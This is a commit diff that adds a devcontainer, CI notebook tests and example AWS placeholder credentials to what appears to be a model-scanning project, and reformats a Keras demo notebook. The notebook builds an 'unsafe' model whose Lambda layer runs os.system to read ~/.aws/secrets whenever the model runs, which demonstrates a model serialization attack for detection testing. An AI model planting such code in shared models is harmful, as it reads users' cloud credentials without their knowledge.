build(devcontainer): 🧑‍💻 add support for reproducible env

.devcontainer/aws_secrets_example

@@ -0,0 +1,2 @@
+aws_access_key_id=AKIAIOSFODNN7EXAMPLE
+aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

.devcontainer/devcontainer.json

@@ -0,0 +1,43 @@
+// For format details, see https://aka.ms/devcontainer.json. For config options, see the
+// README at: https://github.com/devcontainers/templates/tree/main/src/python
+{
+	"name": "Python 3",
+	// Or use a Dockerfile or Docker Compose file. More info: https://containers.dev/guide/dockerfile
+	"image": "mcr.microsoft.com/devcontainers/python:1-3.9-bookworm",
+	// Features to add to the dev container. More info: https://containers.dev/features.
+	"features": {
+		"ghcr.io/devcontainers-contrib/features/poetry:2": {},
+		"ghcr.io/devcontainers-contrib/features/pre-commit:2": {}
+	},
+
+	// Use 'forwardPorts' to make a list of ports inside the container available locally.
+	// "forwardPorts": [],
+
+	// Use 'postCreateCommand' to run commands after the container is created.
+	"postCreateCommand": "make install-dev",
+
+	// Configure tool-specific properties.
+	"customizations": {
+		"vscode": {
+			"settings": {
+				"python.defaultInterpreterPath": "/usr/local/bin/python",
+				"mypy-type-checker.interpreter": [
+                    "/usr/local/bin/python"
+                ]
+			},
+			"extensions": [
+				"streetsidesoftware.code-spell-checker",
+				"ms-python.vscode-pylance",
+				"ms-python.python",
+				"ms-python.mypy-type-checker",
+				"ms-toolsai.jupyter",
+				"tamasfe.even-better-toml"
+			]
+		}
+	},
+
+	// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
+	"mounts": [
+		"source=${localWorkspaceFolder}/.devcontainer/aws_secrets_example,target=/home/vscode/.aws/secrets,type=bind,consistency=cached"
+	]
+}

.github/workflows/test.yml

@@ -37,3 +37,13 @@ jobs:
       - name: Run Tests
         run: |
           make test
+  test-notebooks:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Run notebook tests in devcontainer
+        uses: devcontainers/[email protected]
+        with:
+          cacheFrom: mcr.microsoft.com/devcontainers/python:1-3.9-bookworm
+          push: never
+          runCmd: make test-notebooks

.gitignore

@@ -131,5 +131,7 @@ cython_debug/
 .idea/
 
 # Notebook Model Downloads
+notebooks/KerasModels
 notebooks/PyTorchModels/
-pytorch-model-scan-results.json
+notebooks/TensorFlowModels/
+notebooks/XGBoostModels/

Makefile

@@ -19,6 +19,8 @@ clean:
 test:
 	poetry run pytest
 
+test-notebooks:
+	poetry run pytest --nbmake notebooks/pytorch_sentiment_analysis.ipynb notebooks/xgboost_diabetes_classification.ipynb
 build:
 	poetry build
 

notebooks/keras_fashion_mnist.ipynb

@@ -44,6 +44,7 @@
    "source": [
     "import tensorflow as tf\n",
     "import os\n",
+    "\n",
     "tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n",
     "from utils.tensorflow_fashion_mnist_model import train_model, get_predictions"
    ]
@@ -107,7 +108,9 @@
     "\n",
     "safe_model_path = os.path.join(model_directory, \"safe_model.h5\")\n",
     "model = train_model()\n",
-    "model.save(safe_model_path,)"
+    "model.save(\n",
+    "    safe_model_path,\n",
+    ")"
    ]
   },
   {
@@ -208,16 +211,10 @@
    "source": [
     "safe_model_loaded = tf.keras.models.load_model(safe_model_path)\n",
     "\n",
-    "attack = (    \n",
-    "    lambda x: os.system(\n",
-    "        \"\"\"cat ~/.aws/secrets\"\"\"\n",
-    "    )\n",
-    "    or x\n",
-    ")\n",
+    "attack = lambda x: os.system(\"\"\"cat ~/.aws/secrets\"\"\") or x\n",
     "\n",
     "lambda_layer = tf.keras.layers.Lambda(attack)(safe_model_loaded.outputs[-1])\n",
-    "unsafe_model = tf.keras.Model(inputs=safe_model_loaded.inputs, outputs=lambda_layer)\n",
-    "\n"
+    "unsafe_model = tf.keras.Model(inputs=safe_model_loaded.inputs, outputs=lambda_layer)"
    ]
   },
   {